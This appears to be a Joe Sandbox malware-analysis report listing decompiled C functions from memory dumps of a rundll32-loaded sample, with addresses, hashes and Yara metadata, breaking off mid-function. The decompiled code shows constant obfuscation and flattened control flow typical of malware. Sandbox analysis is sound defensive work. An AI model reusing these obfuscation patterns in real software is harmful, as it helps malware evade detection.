                                                                                                                      0x0017bc57
                                                                                                                      0x0017bc5a
                                                                                                                      0x0017bc60
                                                                                                                      0x0017bc61
                                                                                                                      0x0017bc64
                                                                                                                      0x0017bc68
                                                                                                                      0x0017bc68
                                                                                                                      0x0017bc71
                                                                                                                      0x0017bc71
                                                                                                                      0x0017bc7d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (q$M`(
                                                                                                                      • API String ID: 0-2580875808
                                                                                                                      • Opcode ID: e568486319296607ca6dea0e37a98f8cfb4649cfeb7f911281b771a3c76faa87
                                                                                                                      • Instruction ID: 91cb4f2b9c03a3bc5842fba08ce91121ddb62c1d7c2805d1d814b53d9c8592d0
                                                                                                                      • Opcode Fuzzy Hash: e568486319296607ca6dea0e37a98f8cfb4649cfeb7f911281b771a3c76faa87
                                                                                                                      • Instruction Fuzzy Hash: 62319A72A093018FD344CF18C88441BFBE0FFA8718F058A5CF88997241DB74EA09CB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017F154 Relevance: 2.6, Strings: 2, Instructions: 90COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0017F154(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				short _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v576;
				void* _t83;
				intOrPtr* _t85;
				signed int _t89;

				_v56 = 0xd50633;
				_v52 = 0xe1ee45;
				_v44 = 0;
				_v48 = 0;
				_v24 = 0xad73ca;
				_v24 = _v24 ^ 0x73620612;
				_v24 = _v24 ^ 0x73c7a99a;
				_v32 = 0x597259;
				_t89 = 0x52;
				_push(_t89);
				_v32 = _v32 / _t89;
				_v32 = _v32 ^ 0x0009f267;
				_v20 = 0xd3cfac;
				_v20 = _v20 << 9;
				_v20 = _v20 | 0x4896bc35;
				_v20 = _v20 ^ 0xef9372aa;
				_v28 = 0xdbc61e;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x01b432fd;
				_v16 = 0x90d5a3;
				_v16 = _v16 + 0xffffb729;
				_v16 = _v16 + 0xffff3d25;
				_v16 = _v16 ^ 0x0089c5ce;
				_v8 = 0xd44b29;
				_v8 = _v8 + 0x631b;
				_v8 = _v8 | 0x8b07e3a3;
				_v8 = _v8 * 0x62;
				_v8 = _v8 ^ 0x88a24378;
				_v12 = 0x36955e;
				_v12 = _v12 + 0xb114;
				_v12 = _v12 + 0xffffe207;
				_v12 = _v12 ^ 0x0030a900;
				_v36 = 0x9daa5e;
				_v36 = _v36 + 0xffffbce6;
				_v36 = _v36 ^ 0x0093fbb5;
				_v40 = 0x60d009;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x003d09ba;
				_t96 = _v24;
				_t83 = E00175C03( &_v576, _v24, _v32);
				_pop(0);
				if(_t83 != 0) {
					_t85 =  &_v576;
					if(_v576 != 0) {
						while( *_t85 != 0x5c) {
							_t85 = _t85 + 2;
							if( *_t85 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						 *((short*)(_t85 + 2)) = 0;
					}
					L6:
					_push(0);
					_push(0);
					E0017884A(_v20, _t96, _v28, _v16, 0, _v8, 0, _v12,  &_v576, _v36, 0,  &_v44, _v40);
				}
				return _v44;
			}




















                                                                                                                      0x0017f15d
                                                                                                                      0x0017f166
                                                                                                                      0x0017f170
                                                                                                                      0x0017f173
                                                                                                                      0x0017f176
                                                                                                                      0x0017f17d
                                                                                                                      0x0017f184
                                                                                                                      0x0017f18b
                                                                                                                      0x0017f197
                                                                                                                      0x0017f19a
                                                                                                                      0x0017f19b
                                                                                                                      0x0017f1a4
                                                                                                                      0x0017f1ab
                                                                                                                      0x0017f1b2
                                                                                                                      0x0017f1b6
                                                                                                                      0x0017f1bd
                                                                                                                      0x0017f1c4
                                                                                                                      0x0017f1cb
                                                                                                                      0x0017f1ce
                                                                                                                      0x0017f1d5
                                                                                                                      0x0017f1dc
                                                                                                                      0x0017f1e3
                                                                                                                      0x0017f1ea
                                                                                                                      0x0017f1f1
                                                                                                                      0x0017f1f8
                                                                                                                      0x0017f1ff
                                                                                                                      0x0017f20a
                                                                                                                      0x0017f20d
                                                                                                                      0x0017f214
                                                                                                                      0x0017f21b
                                                                                                                      0x0017f222
                                                                                                                      0x0017f229
                                                                                                                      0x0017f230
                                                                                                                      0x0017f237
                                                                                                                      0x0017f23e
                                                                                                                      0x0017f245
                                                                                                                      0x0017f24c
                                                                                                                      0x0017f24f
                                                                                                                      0x0017f259
                                                                                                                      0x0017f25c
                                                                                                                      0x0017f262
                                                                                                                      0x0017f265
                                                                                                                      0x0017f267
                                                                                                                      0x0017f274
                                                                                                                      0x0017f276
                                                                                                                      0x0017f27c
                                                                                                                      0x0017f282
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017f284
                                                                                                                      0x00000000
                                                                                                                      0x0017f282
                                                                                                                      0x0017f288
                                                                                                                      0x0017f288
                                                                                                                      0x0017f28c
                                                                                                                      0x0017f28c
                                                                                                                      0x0017f28d
                                                                                                                      0x0017f2b1
                                                                                                                      0x0017f2b6
                                                                                                                      0x0017f2c0

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: E$YrY
                                                                                                                      • API String ID: 0-1711274510
                                                                                                                      • Opcode ID: 8312f07bc65dbe4574ba273e034b45cddb48f3c575f5b78e5fcdda2b4a27f55a
                                                                                                                      • Instruction ID: e2efd807b8aa890297b0b9d7b42d9c8bd55d646c4530cac611248ca08f31c5dd
                                                                                                                      • Opcode Fuzzy Hash: 8312f07bc65dbe4574ba273e034b45cddb48f3c575f5b78e5fcdda2b4a27f55a
                                                                                                                      • Instruction Fuzzy Hash: 5341E272C0121EEBCF59CFE4C94A9EEBBB5FB04304F208199E415B62A0E7B54A45DF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001CD16 Relevance: 1.9, APIs: 1, Instructions: 445COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 431132790-0
                                                                                                                      • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                      • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100134F0 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Iconic
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 110040809-0
                                                                                                                      • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                      • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001864F1 Relevance: 1.4, Strings: 1, Instructions: 152COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E001864F1(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t137;
				void* _t150;
				intOrPtr _t151;
				void* _t157;
				intOrPtr* _t172;
				intOrPtr _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int* _t179;

				_t155 = _a4;
				_push(_a8);
				_t172 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t137);
				_v48 = 0x93d665;
				_t179 =  &(( &_v100)[4]);
				_t173 = 0;
				_v44 = 0;
				_t157 = 0x9466795;
				_v40 = 0;
				_v92 = 0xc35ba1;
				_v92 = _v92 + 0xcdf2;
				_t174 = 0x24;
				_v92 = _v92 / _t174;
				_v92 = _v92 ^ 0x5a7ecd09;
				_v92 = _v92 ^ 0x5a7bbfe7;
				_v56 = 0x6ac612;
				_v56 = _v56 ^ 0x41bcc0f7;
				_v56 = _v56 + 0xffffadf0;
				_v56 = _v56 ^ 0x41d5b4d5;
				_v100 = 0xa175c9;
				_v100 = _v100 | 0xb7da1d5b;
				_v100 = _v100 ^ 0x832b9b3a;
				_v100 = _v100 ^ 0xfbd8173c;
				_v100 = _v100 ^ 0xcf0e566f;
				_v68 = 0xb337e;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 + 0xffffb10e;
				_v68 = _v68 ^ 0xfff97d65;
				_v72 = 0x51a563;
				_v72 = _v72 | 0x5dd657cd;
				_v72 = _v72 >> 0xb;
				_v72 = _v72 ^ 0x0003baa1;
				_v76 = 0xe50ce8;
				_t175 = 0x4f;
				_v76 = _v76 / _t175;
				_v76 = _v76 | 0x5f70b90d;
				_v76 = _v76 ^ 0x5f701ab2;
				_v80 = 0xbdb868;
				_v80 = _v80 * 0x3f;
				_v80 = _v80 + 0x8645;
				_v80 = _v80 | 0x0d4f9aa3;
				_v80 = _v80 ^ 0x2ff450e8;
				_v52 = 0x17e057;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x00020d27;
				_v60 = 0xa13b54;
				_v60 = _v60 * 0x33;
				_v60 = _v60 ^ 0x49292d47;
				_v60 = _v60 ^ 0x693c6a3c;
				_v84 = 0xcd99b1;
				_v84 = _v84 + 0x2d8d;
				_v84 = _v84 << 7;
				_v84 = _v84 + 0xffff7b1e;
				_v84 = _v84 ^ 0x66e29e95;
				_v88 = 0xe50b02;
				_v88 = _v88 ^ 0x6ddcea1b;
				_v88 = _v88 >> 0x10;
				_v88 = _v88 * 0x49;
				_v88 = _v88 ^ 0x001db712;
				_v64 = 0xb5c75b;
				_v64 = _v64 * 0x46;
				_t176 = 0x77;
				_v64 = _v64 / _t176;
				_v64 = _v64 ^ 0x006c56aa;
				_v96 = 0xaabe6e;
				_v96 = _v96 << 5;
				_v96 = _v96 + 0xffff8361;
				_v96 = _v96 << 3;
				_v96 = _v96 ^ 0xaab2b903;
				do {
					while(_t157 != 0x179a40a) {
						if(_t157 == 0x8ebb7f5) {
							_t151 =  *0x195c9c; // 0x0
							E0018D6C0(_v80, _v52, _v60, _t157, _v84, _v88,  &_v36, _t157, _v64, _v92, _v96,  *_t155,  *((intOrPtr*)(_t155 + 4)),  *((intOrPtr*)(_t151 + 8)));
							_t173 =  ==  ? 1 : _t173;
						} else {
							if(_t157 != 0x9466795) {
								goto L8;
							} else {
								_t157 = 0x179a40a;
								continue;
							}
						}
						L11:
						return _t173;
					}
					_push( *_t172);
					_t150 = E00181831(_v68, _v72,  &_v36, _v76, _t157,  *((intOrPtr*)(_t172 + 4)));
					_t179 =  &(_t179[6]);
					if(_t150 == 0) {
						_t157 = 0x49089dc;
						goto L8;
					} else {
						_t157 = 0x8ebb7f5;
						continue;
					}
					goto L11;
					L8:
				} while (_t157 != 0x49089dc);
				goto L11;
			}






























                                                                                                                      0x001864f5
                                                                                                                      0x001864fc
                                                                                                                      0x00186500
                                                                                                                      0x00186502
                                                                                                                      0x00186503
                                                                                                                      0x00186504
                                                                                                                      0x00186505
                                                                                                                      0x0018650a
                                                                                                                      0x00186512
                                                                                                                      0x00186515
                                                                                                                      0x00186519
                                                                                                                      0x0018651d
                                                                                                                      0x00186522
                                                                                                                      0x00186526
                                                                                                                      0x0018652e
                                                                                                                      0x0018653c
                                                                                                                      0x00186541
                                                                                                                      0x00186547
                                                                                                                      0x0018654f
                                                                                                                      0x00186557
                                                                                                                      0x0018655f
                                                                                                                      0x00186567
                                                                                                                      0x0018656f
                                                                                                                      0x00186577
                                                                                                                      0x0018657f
                                                                                                                      0x00186587
                                                                                                                      0x0018658f
                                                                                                                      0x00186597
                                                                                                                      0x0018659f
                                                                                                                      0x001865a7
                                                                                                                      0x001865ac
                                                                                                                      0x001865b4
                                                                                                                      0x001865bc
                                                                                                                      0x001865c4
                                                                                                                      0x001865cc
                                                                                                                      0x001865d1
                                                                                                                      0x001865d9
                                                                                                                      0x001865e5
                                                                                                                      0x001865e8
                                                                                                                      0x001865ec
                                                                                                                      0x001865f4
                                                                                                                      0x001865fc
                                                                                                                      0x00186609
                                                                                                                      0x0018660d
                                                                                                                      0x00186615
                                                                                                                      0x0018661d
                                                                                                                      0x00186625
                                                                                                                      0x0018662d
                                                                                                                      0x00186632
                                                                                                                      0x0018663a
                                                                                                                      0x00186647
                                                                                                                      0x0018664b
                                                                                                                      0x00186653
                                                                                                                      0x0018665b
                                                                                                                      0x00186663
                                                                                                                      0x0018666b
                                                                                                                      0x00186670
                                                                                                                      0x00186678
                                                                                                                      0x00186680
                                                                                                                      0x00186688
                                                                                                                      0x00186690
                                                                                                                      0x0018669a
                                                                                                                      0x0018669e
                                                                                                                      0x001866a6
                                                                                                                      0x001866b3
                                                                                                                      0x001866bf
                                                                                                                      0x001866c7
                                                                                                                      0x001866cb
                                                                                                                      0x001866d3
                                                                                                                      0x001866db
                                                                                                                      0x001866e0
                                                                                                                      0x001866e8
                                                                                                                      0x001866ed
                                                                                                                      0x001866f5
                                                                                                                      0x001866f5
                                                                                                                      0x001866ff
                                                                                                                      0x0018674a
                                                                                                                      0x0018677e
                                                                                                                      0x0018678f
                                                                                                                      0x00186701
                                                                                                                      0x00186707
                                                                                                                      0x00000000
                                                                                                                      0x00186709
                                                                                                                      0x00186709
                                                                                                                      0x00000000
                                                                                                                      0x00186709
                                                                                                                      0x00186707
                                                                                                                      0x00186793
                                                                                                                      0x0018679b
                                                                                                                      0x0018679b
                                                                                                                      0x0018670d
                                                                                                                      0x00186728
                                                                                                                      0x0018672d
                                                                                                                      0x00186732
                                                                                                                      0x0018673b
                                                                                                                      0x00000000
                                                                                                                      0x00186734
                                                                                                                      0x00186734
                                                                                                                      0x00000000
                                                                                                                      0x00186734
                                                                                                                      0x00000000
                                                                                                                      0x00186740
                                                                                                                      0x00186740
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <j<i
                                                                                                                      • API String ID: 0-2573498096
                                                                                                                      • Opcode ID: 6d1e5c71e07a043400845355e6747196415eb228be0975844849aa1dbaf11c06
                                                                                                                      • Instruction ID: 792129efa7cbc2158001e8668a26a7656eaf7caf1430869aa3f3eb03dd293adc
                                                                                                                      • Opcode Fuzzy Hash: 6d1e5c71e07a043400845355e6747196415eb228be0975844849aa1dbaf11c06
                                                                                                                      • Instruction Fuzzy Hash: 4F6110B15093419FC754DF25C98A81BFBE2FBC4B58F409A1EF58696220E3718A49CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00184B56 Relevance: 1.4, Strings: 1, Instructions: 131COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00184B56() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _t95;
				signed int _t101;
				signed int _t103;
				void* _t104;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				void* _t126;
				signed int _t127;
				signed int* _t128;

				_t128 =  &_v564;
				_v556 = 0x172e57;
				_v556 = _v556 ^ 0x73ef0dea;
				_t104 = 0x4d22871;
				_v556 = _v556 << 5;
				_v556 = _v556 ^ 0x7f0420db;
				_v564 = 0x28c43f;
				_t122 = 0x37;
				_v564 = _v564 / _t122;
				_v564 = _v564 ^ 0x0004b302;
				_t126 = 0;
				_v540 = 0xa3dd1;
				_v540 = _v540 >> 7;
				_v540 = _v540 ^ 0x000ead4a;
				_v548 = 0xb6c83;
				_v548 = _v548 >> 2;
				_v548 = _v548 ^ 0x000dd0d2;
				_v544 = 0xa789eb;
				_t123 = 0x5a;
				_v544 = _v544 / _t123;
				_v544 = _v544 ^ 0x000aafac;
				_v532 = 0x6a9d21;
				_t124 = 0x13;
				_t125 = _v564;
				_v532 = _v532 / _t124;
				_v532 = _v532 ^ 0x0003d3c1;
				_v528 = 0x3996e5;
				_v528 = _v528 >> 4;
				_v528 = _v528 ^ 0x0009e8d5;
				_t103 = _v564;
				_t127 = _v564;
				_v536 = 0xc5251e;
				_v536 = _v536 ^ 0x87fb489f;
				_v536 = _v536 ^ 0x87377a50;
				_v560 = 0x43b612;
				_v560 = _v560 >> 0xe;
				_v560 = _v560 ^ 0x7320a641;
				_v560 = _v560 ^ 0xd4a0e575;
				_v560 = _v560 ^ 0xa78970ff;
				_v552 = 0x3a31ae;
				_v552 = _v552 ^ 0x0baee347;
				_v552 = _v552 ^ 0x0b916be4;
				do {
					while(_t104 != 0x42ef3b0) {
						if(_t104 == 0x4d22871) {
							_t104 = 0xc70fe83;
							continue;
						} else {
							if(_t104 == 0x81a395a) {
								_v564 = 0x2f01d9;
								_v564 = _v564 + 0xd8f0;
								_v564 = _v564 ^ 0x2a08da2b;
								__eflags = _t103 - _v564;
								_t126 =  ==  ? 1 : _t126;
							} else {
								if(_t104 == 0x918a316) {
									_t103 = E00177677(_t127, _v536, _v560, _v552);
									_t104 = 0x81a395a;
									continue;
								} else {
									if(_t104 == 0xc70fe83) {
										_t101 = E0017C706();
										_t125 = _t101;
										__eflags = _t101;
										if(__eflags != 0) {
											_t104 = 0x42ef3b0;
											continue;
										}
									} else {
										if(_t104 != 0xea0747d) {
											goto L15;
										} else {
											_t127 = E00184FA8(_v544,  &_v524, _v532, _v528);
											_t104 = 0x918a316;
											continue;
										}
									}
								}
							}
						}
						L18:
						return _t126;
					}
					_t95 = E00191993(_v564, _v540, __eflags,  &_v524, _t104, _v548, _t125);
					_t128 =  &(_t128[4]);
					__eflags = _t95;
					if(__eflags == 0) {
						_t104 = 0xffaf3fd;
						goto L15;
					} else {
						_t104 = 0xea0747d;
						continue;
					}
					goto L18;
					L15:
					__eflags = _t104 - 0xffaf3fd;
				} while (__eflags != 0);
				goto L18;
			}
























                                                                                                                      0x00184b56
                                                                                                                      0x00184b5c
                                                                                                                      0x00184b66
                                                                                                                      0x00184b6e
                                                                                                                      0x00184b73
                                                                                                                      0x00184b78
                                                                                                                      0x00184b80
                                                                                                                      0x00184b90
                                                                                                                      0x00184b95
                                                                                                                      0x00184b9b
                                                                                                                      0x00184ba3
                                                                                                                      0x00184ba5
                                                                                                                      0x00184bad
                                                                                                                      0x00184bb2
                                                                                                                      0x00184bba
                                                                                                                      0x00184bc2
                                                                                                                      0x00184bc7
                                                                                                                      0x00184bcf
                                                                                                                      0x00184bdb
                                                                                                                      0x00184be0
                                                                                                                      0x00184be6
                                                                                                                      0x00184bee
                                                                                                                      0x00184bfa
                                                                                                                      0x00184bfd
                                                                                                                      0x00184c01
                                                                                                                      0x00184c05
                                                                                                                      0x00184c0d
                                                                                                                      0x00184c15
                                                                                                                      0x00184c1a
                                                                                                                      0x00184c22
                                                                                                                      0x00184c26
                                                                                                                      0x00184c2a
                                                                                                                      0x00184c32
                                                                                                                      0x00184c3a
                                                                                                                      0x00184c42
                                                                                                                      0x00184c4a
                                                                                                                      0x00184c4f
                                                                                                                      0x00184c57
                                                                                                                      0x00184c5f
                                                                                                                      0x00184c67
                                                                                                                      0x00184c6f
                                                                                                                      0x00184c77
                                                                                                                      0x00184c7f
                                                                                                                      0x00184c7f
                                                                                                                      0x00184c91
                                                                                                                      0x00184d1a
                                                                                                                      0x00000000
                                                                                                                      0x00184c97
                                                                                                                      0x00184c9d
                                                                                                                      0x00184d60
                                                                                                                      0x00184d6a
                                                                                                                      0x00184d73
                                                                                                                      0x00184d7f
                                                                                                                      0x00184d81
                                                                                                                      0x00184ca3
                                                                                                                      0x00184ca9
                                                                                                                      0x00184d0e
                                                                                                                      0x00184d10
                                                                                                                      0x00000000
                                                                                                                      0x00184cab
                                                                                                                      0x00184cb1
                                                                                                                      0x00184ce3
                                                                                                                      0x00184ce8
                                                                                                                      0x00184cea
                                                                                                                      0x00184cec
                                                                                                                      0x00184cf2
                                                                                                                      0x00000000
                                                                                                                      0x00184cf2
                                                                                                                      0x00184cb3
                                                                                                                      0x00184cb9
                                                                                                                      0x00000000
                                                                                                                      0x00184cbf
                                                                                                                      0x00184cd6
                                                                                                                      0x00184cd8
                                                                                                                      0x00000000
                                                                                                                      0x00184cd8
                                                                                                                      0x00184cb9
                                                                                                                      0x00184cb1
                                                                                                                      0x00184ca9
                                                                                                                      0x00184c9d
                                                                                                                      0x00184d85
                                                                                                                      0x00184d90
                                                                                                                      0x00184d90
                                                                                                                      0x00184d37
                                                                                                                      0x00184d3c
                                                                                                                      0x00184d3f
                                                                                                                      0x00184d41
                                                                                                                      0x00184d4d
                                                                                                                      0x00000000
                                                                                                                      0x00184d43
                                                                                                                      0x00184d43
                                                                                                                      0x00000000
                                                                                                                      0x00184d43
                                                                                                                      0x00000000
                                                                                                                      0x00184d52
                                                                                                                      0x00184d52
                                                                                                                      0x00184d52
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: s
                                                                                                                      • API String ID: 0-1867647943
                                                                                                                      • Opcode ID: 34bd5959cf2d6eb589c4a5b2399f6c39d3f0ab0d666f3f677d61167571982d03
                                                                                                                      • Instruction ID: 5a7bff777f255291dc6010ff0e8b1610169da60d18a095e78a653c894836bea5
                                                                                                                      • Opcode Fuzzy Hash: 34bd5959cf2d6eb589c4a5b2399f6c39d3f0ab0d666f3f677d61167571982d03
                                                                                                                      • Instruction Fuzzy Hash: 2951DB712093429FC358EF65D18942BBBE1EFD4708F20892EF59A96260CB70DA09CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017E86A Relevance: 1.4, Strings: 1, Instructions: 118COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0017E86A() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _t97;
				signed int _t99;
				intOrPtr _t100;
				void* _t105;
				signed int _t114;
				short* _t117;
				signed int* _t119;

				_t119 =  &_v564;
				_v560 = 0xce5cf0;
				_v560 = _v560 | 0x815fac8b;
				_t105 = 0x687a68b;
				_t114 = 0x3d;
				_v560 = _v560 / _t114;
				_v560 = _v560 ^ 0x02257571;
				_v552 = 0x865242;
				_v552 = _v552 * 0x34;
				_v552 = _v552 >> 6;
				_v552 = _v552 ^ 0x0066bbb6;
				_v524 = 0xc32fa5;
				_v524 = _v524 * 0x41;
				_v524 = _v524 ^ 0x3182565b;
				_v548 = 0xb61c38;
				_v548 = _v548 * 0x62;
				_v548 = _v548 | 0xd3f7f889;
				_v548 = _v548 ^ 0xd7f1c5f5;
				_v536 = 0xb1408a;
				_v536 = _v536 >> 3;
				_v536 = _v536 ^ 0x001ed817;
				_v556 = 0x4c3333;
				_v556 = _v556 + 0xffff679f;
				_v556 = _v556 >> 0xf;
				_v556 = _v556 ^ 0x000b6621;
				_v528 = 0x174ea7;
				_v528 = _v528 >> 8;
				_v528 = _v528 ^ 0x00085e65;
				_v540 = 0x951329;
				_v540 = _v540 ^ 0x02360ba7;
				_v540 = _v540 ^ 0x02aaf891;
				_v564 = 0x7a8127;
				_v564 = _v564 | 0x4a3ea7d2;
				_v564 = _v564 * 0x6d;
				_v564 = _v564 + 0xffffd056;
				_v564 = _v564 ^ 0xb7eba97a;
				_v532 = 0x65650b;
				_t97 = _v532 * 5;
				_v532 = _t97;
				_v532 = _v532 ^ 0x01f4ff6f;
				do {
					while(_t105 != 0xb436d6) {
						if(_t105 == 0x2c7b739) {
							_t100 =  *0x19520c; // 0x0
							__eflags = _t100 + 0x220;
							return E001808A0(_t117, _v540, _v564, _t100 + 0x220, _v532);
						}
						if(_t105 == 0x687a68b) {
							_t105 = 0xdf97892;
							continue;
						}
						_t125 = _t105 - 0xdf97892;
						if(_t105 != 0xdf97892) {
							goto L15;
						}
						_t97 = E001912A8(_t105, _v560, _t125, _v552, _v524,  &_v520);
						_t119 =  &(_t119[3]);
						_t105 = 0xb436d6;
					}
					_v544 = 0xaf74ff;
					_v544 = _v544 + 0xc134;
					_v544 = _v544 ^ 0x00b03631;
					_t99 = E0018BA68(_v548, _v536, _v556,  &_v520, _v528);
					_t119 =  &(_t119[3]);
					_t117 =  &_v520 + _t99 * 2;
					while(1) {
